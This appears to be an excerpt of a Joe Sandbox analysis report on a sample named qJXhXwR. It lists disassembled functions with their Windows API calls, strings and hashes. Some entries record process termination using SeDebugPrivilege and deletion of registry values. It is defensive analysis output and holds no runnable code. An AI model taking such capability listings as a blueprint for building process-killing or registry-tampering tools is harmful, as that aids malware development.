Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Window$CreateObjectStockwcscat
String ID: -----$SysListView32
API String ID: 2361508679-3975388722
Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
Instruction ID: d3bbeaeb81511897ec6ba4a363b034d6dcb22e2c600f383b401e42a963ab4172
Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
Instruction Fuzzy Hash: 1D51D372A057818AE720DF25E8446ED73B1FB85B84F81013ADE4D07BA9CF39D594CB40

Function 00007FF7A520E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00007FF7A520E2DF
GetClassNameW.USER32 ref: 00007FF7A520E2F6

Part of subcall function 00007FF7A51C8E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C8E4F

SendMessageW.USER32 ref: 00007FF7A520E386

Strings

details, xrefs: 00007FF7A520E32F
largeicons, xrefs: 00007FF7A520E314
SHELLDLL_DefView, xrefs: 00007FF7A520E2FC
smallicons, xrefs: 00007FF7A520E34A
list, xrefs: 00007FF7A520E365

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 2019164449-3381328864
Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
Instruction ID: dfb9f9cf4dc56b3bedb76ff3daa2765ee61bf71c0e24b41fecb2226c14b7444a
Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
Instruction Fuzzy Hash: 2C2162A1B1F51390FA64B721FD94279A750AF93F84F824036C90D476F9EE2DE5428720

Function 00007FF7A5237054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7A5237168
FreeLibrary.KERNEL32 ref: 00007FF7A52371A9
QueryPathOfRegTypeLib.OLEAUT32 ref: 00007FF7A52373B2
SysFreeString.OLEAUT32 ref: 00007FF7A52373E7
StringFromGUID2.OLE32 ref: 00007FF7A5237585

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FreeString$FileFromLibraryModuleNamePathQueryType
String ID:
API String ID: 1903627254-0
Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
Instruction ID: 48af7a3fb732b26a9b47e365ced0e2b495e5090def31a79e5994857533841332
Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
Instruction Fuzzy Hash: 2A026CA2A09A8682DF54EF25D8441ADA760FB85F94F964032EF4E077B8CF3CD649C750

Function 00007FF7A524C324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF7A524C40A
ShowWindow.USER32(00000000,?,?,00007FF7A51EDF87), ref: 00007FF7A524C449
ShowWindow.USER32 ref: 00007FF7A524C457
SetFocus.USER32 ref: 00007FF7A524C460

Part of subcall function 00007FF7A524E7D4: DeleteObject.GDI32 ref: 00007FF7A524E82A

GetWindowLongW.USER32 ref: 00007FF7A524C4A8
SetWindowLongPtrW.USER32 ref: 00007FF7A524C4BD
InvalidateRect.USER32(00000000,?,?,00007FF7A51EDF87), ref: 00007FF7A524C4F7
SendMessageW.USER32 ref: 00007FF7A524C536
SendMessageW.USER32 ref: 00007FF7A524C54A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
Instruction ID: c36dbe8f751570bd978720214c9079e459edf08a41b43776d30df519eb8cc22f
Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
Instruction Fuzzy Hash: 1861C6A5A0A54386F734BB29DC447B99671AFC2FA4F924031EA1D136FECE7DE4409320

Function 00007FF7A520D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7A520D7A2
HeapAlloc.KERNEL32 ref: 00007FF7A520D7B4
GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7BD
GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7C6
DuplicateHandle.KERNEL32 ref: 00007FF7A520D7EA
GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7F0
GetCurrentProcess.KERNEL32 ref: 00007FF7A520D7F9
DuplicateHandle.KERNEL32 ref: 00007FF7A520D81E
CreateThread.KERNEL32 ref: 00007FF7A520D844

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
Instruction ID: 70fd8363b96124eded939a8a56bb46067ae1b1a07ee2d7a38af2c4bb9a7e38fc
Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
Instruction Fuzzy Hash: 6A215E76616B8182E710DF42E848369B7A0F749FEAF854125DA8D03BA8CF3DE148C700

Function 00007FF7A5250B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

Part of subcall function 00007FF7A51A1CEC: GetCursorPos.USER32 ref: 00007FF7A51A1D1B
Part of subcall function 00007FF7A51A1CEC: ScreenToClient.USER32 ref: 00007FF7A51A1D3A
Part of subcall function 00007FF7A51A1CEC: GetAsyncKeyState.USER32 ref: 00007FF7A51A1D62
Part of subcall function 00007FF7A51A1CEC: GetAsyncKeyState.USER32 ref: 00007FF7A51A1D82

ImageList_DragLeave.COMCTL32 ref: 00007FF7A5250BA4
ImageList_EndDrag.COMCTL32 ref: 00007FF7A5250BAA
ReleaseCapture.USER32 ref: 00007FF7A5250BB0
SetWindowTextW.USER32 ref: 00007FF7A5250C5E
SendMessageW.USER32 ref: 00007FF7A5250C73

Strings

@GUI_DROPID, xrefs: 00007FF7A5250C99
@GUI_DRAGFILE, xrefs: 00007FF7A5250CE0

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 3721556410-2107944366
Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
Instruction ID: 0516270b56cd9d6a050906af97a5348e9b7de45d2758b805134f19717fe472c7
Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
Instruction Fuzzy Hash: 9D618BA6A16A56C5EB00EB61EC805E97760FB45B98F920132EE0D13BBDCE3CE545C360

Function 00007FF7A523E580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A521BE00: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A521BE3B
Part of subcall function 00007FF7A521BE00: Process32FirstW.KERNEL32 ref: 00007FF7A521BE4B
Part of subcall function 00007FF7A521BE00: CloseHandle.KERNEL32 ref: 00007FF7A521BF55

OpenProcess.KERNEL32 ref: 00007FF7A523E610
GetLastError.KERNEL32 ref: 00007FF7A523E622
OpenProcess.KERNEL32 ref: 00007FF7A523E65B
TerminateProcess.KERNEL32 ref: 00007FF7A523E702
GetLastError.KERNEL32 ref: 00007FF7A523E70C
CloseHandle.KERNEL32 ref: 00007FF7A523E75A

Strings

SeDebugPrivilege, xrefs: 00007FF7A523E633

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
Instruction ID: c84490c2cfc860ec6b2e011c8604a6331518f516de9b768aebb029989a122b2a
Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
Instruction Fuzzy Hash: F15173A2B0964282FB05EB25D490378AB60FF86F90F878431D60D476FADF7CE5058720

Function 00007FF7A521A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF7A521A12F
IsMenu.USER32 ref: 00007FF7A521A151
CreatePopupMenu.USER32 ref: 00007FF7A521A183
GetMenuItemCount.USER32 ref: 00007FF7A521A1DD
InsertMenuItemW.USER32 ref: 00007FF7A521A209

Strings

P, xrefs: 00007FF7A521A0D0
2, xrefs: 00007FF7A521A167

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 2$P
API String ID: 93392585-1110268094
Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
Instruction ID: 25640718b70c76ad10a393fe327078dd29615b50de84a208cda9f85979d27c46
Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
Instruction Fuzzy Hash: 0D51F572B0664285F720AF65EC402BEB7A1BB02F54FA54135CA1D476ECCF3DE4858760

Function 00007FF7A524E248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF7A524E32E
SetWindowLongPtrW.USER32(?,?,?,?,?,?,?,?,00000000,00007FF7A522BDFB), ref: 00007FF7A524E346
SetWindowLongPtrW.USER32(?,?,?,?,?,?,?,?,00000000,00007FF7A522BDFB), ref: 00007FF7A524E360
SendMessageW.USER32 ref: 00007FF7A524E38D
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF7A522BDFB), ref: 00007FF7A524E3B1
SetWindowPos.USER32 ref: 00007FF7A524E3F7

Strings

', xrefs: 00007FF7A524E3E2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$LongMessageSend$Show
String ID: '
API String ID: 257662517-1997036262
Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
Instruction ID: 7f99a8f345c78ff7b59a9d7825fd3eeea4bd762cd4b2f61e7b58c63364d8c342
Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
Instruction Fuzzy Hash: 23512972A0A64281F365AB65AC54A7DAB60FB83F90F964131CE5E037F8CE3DE441C725

Function 00007FF7A521AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51C8E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51C8E4F

LoadIconW.USER32 ref: 00007FF7A521AE50

Strings

warning, xrefs: 00007FF7A521AE36
blank, xrefs: 00007FF7A521ADC9
stop, xrefs: 00007FF7A521AE1C
info, xrefs: 00007FF7A521ADE8
question, xrefs: 00007FF7A521AE02

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconLoad_invalid_parameter_noinfo
String ID: blank$info$question$stop$warning
API String ID: 4060274358-404129466
Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
Instruction ID: 3a3f75727f1d67d9b5b6e00a6324bd67046003f27db8bba7866ca5f976e2da4a
Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
Instruction Fuzzy Hash: 022187A1B0E79391EA55AB26AD0017AE351BF86F90F864030DD0D422E9EF3DE4428A60

Function 00007FF7A521C5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7A521C5DC
LoadStringW.USER32 ref: 00007FF7A521C5F2
GetModuleHandleW.KERNEL32 ref: 00007FF7A521C5FA
LoadStringW.USER32 ref: 00007FF7A521C616
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A521C649
MessageBoxW.USER32 ref: 00007FF7A521C665

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00007FF7A521C642

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HandleLoadModuleString$Messagewprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4051287042-3128320259
Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
Instruction ID: 68df9c711db8b5bfb66819712e90537dcc984188ef39e09882272f75dc8910bf
Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
Instruction Fuzzy Hash: CA11A5B1719B8591D734AB10FC407EAA360FB99B44FC21036DA4E43AACCE3CD145C750

Function 00007FF7A525233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

GetSystemMetrics.USER32 ref: 00007FF7A52523A5
GetSystemMetrics.USER32 ref: 00007FF7A52523C4
MoveWindow.USER32 ref: 00007FF7A52525F9
SendMessageW.USER32 ref: 00007FF7A525261A
SendMessageW.USER32 ref: 00007FF7A525263E
ShowWindow.USER32 ref: 00007FF7A525265E
InvalidateRect.USER32(?,?,?,00000000,?,?,?,00007FF7A51EAA58), ref: 00007FF7A525268B
DefDlgProcW.USER32(?,?,?,00000000,?,?,?,00007FF7A51EAA58), ref: 00007FF7A52526B3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
Instruction ID: edaecf53238a87db573fa77844a46919c878834cd975182b9cfdd1a3e5ba0ee5
Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
Instruction Fuzzy Hash: 57A136A671A28382E76CAF259950779B7A1FB95F44F425035EA0A43BE8CF3CE854C710

Function 00007FF7A523FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5241110: CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7A523FD7B), ref: 00007FF7A5241143

RegConnectRegistryW.ADVAPI32 ref: 00007FF7A523FDAE
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A523FE30
RegDeleteValueW.ADVAPI32 ref: 00007FF7A523FEC7
RegCloseKey.ADVAPI32 ref: 00007FF7A523FF34
RegCloseKey.ADVAPI32 ref: 00007FF7A5240041

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
String ID:
API String ID: 50796853-0
Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
Instruction ID: 7848cfb6f2b0311cc6740a044a96a5991b3b33855ef28e200e32ea4084e352a1
Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
Instruction Fuzzy Hash: 0EB18172B0AA4285EB11EF65E4903BCA760EF96F84F824531DA4E476EADF3CD105C760

Function 00007FF7A51C443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF7A51C44CD
ShowWindow.USER32 ref: 00007FF7A520A753
ShowWindow.USER32 ref: 00007FF7A520A7ED

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
Instruction ID: e9377186b8c4960b05d35a3a20a5e322c790c4494cb9b266fd8d8b26250500f0
Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
Instruction Fuzzy Hash: EA51A661F0E58288F7767B25E84437DA6919F83F05FAA4071C50E066FDDFAEA884C360

Function 00007FF7A52490A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7A52490D8
GetDC.USER32 ref: 00007FF7A52490E0
GetDeviceCaps.GDI32 ref: 00007FF7A52490F1
ReleaseDC.USER32 ref: 00007FF7A52490FE
CreateFontW.GDI32 ref: 00007FF7A5249195
SendMessageW.USER32 ref: 00007FF7A52491AB
MoveWindow.USER32 ref: 00007FF7A52491F1
SendMessageW.USER32 ref: 00007FF7A5249213

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
Instruction ID: d6c8dddc8fb907cd9cc53deaa0dc4ee863f2809498bd93c601425768f9d44410
Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
Instruction Fuzzy Hash: 3241B2B662968187D724CB21B854B6ABBA0F795BD1F518135EF8A03B68DF3DD4408B00

Function 00007FF7A51E0BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1001

Memory Dump Source

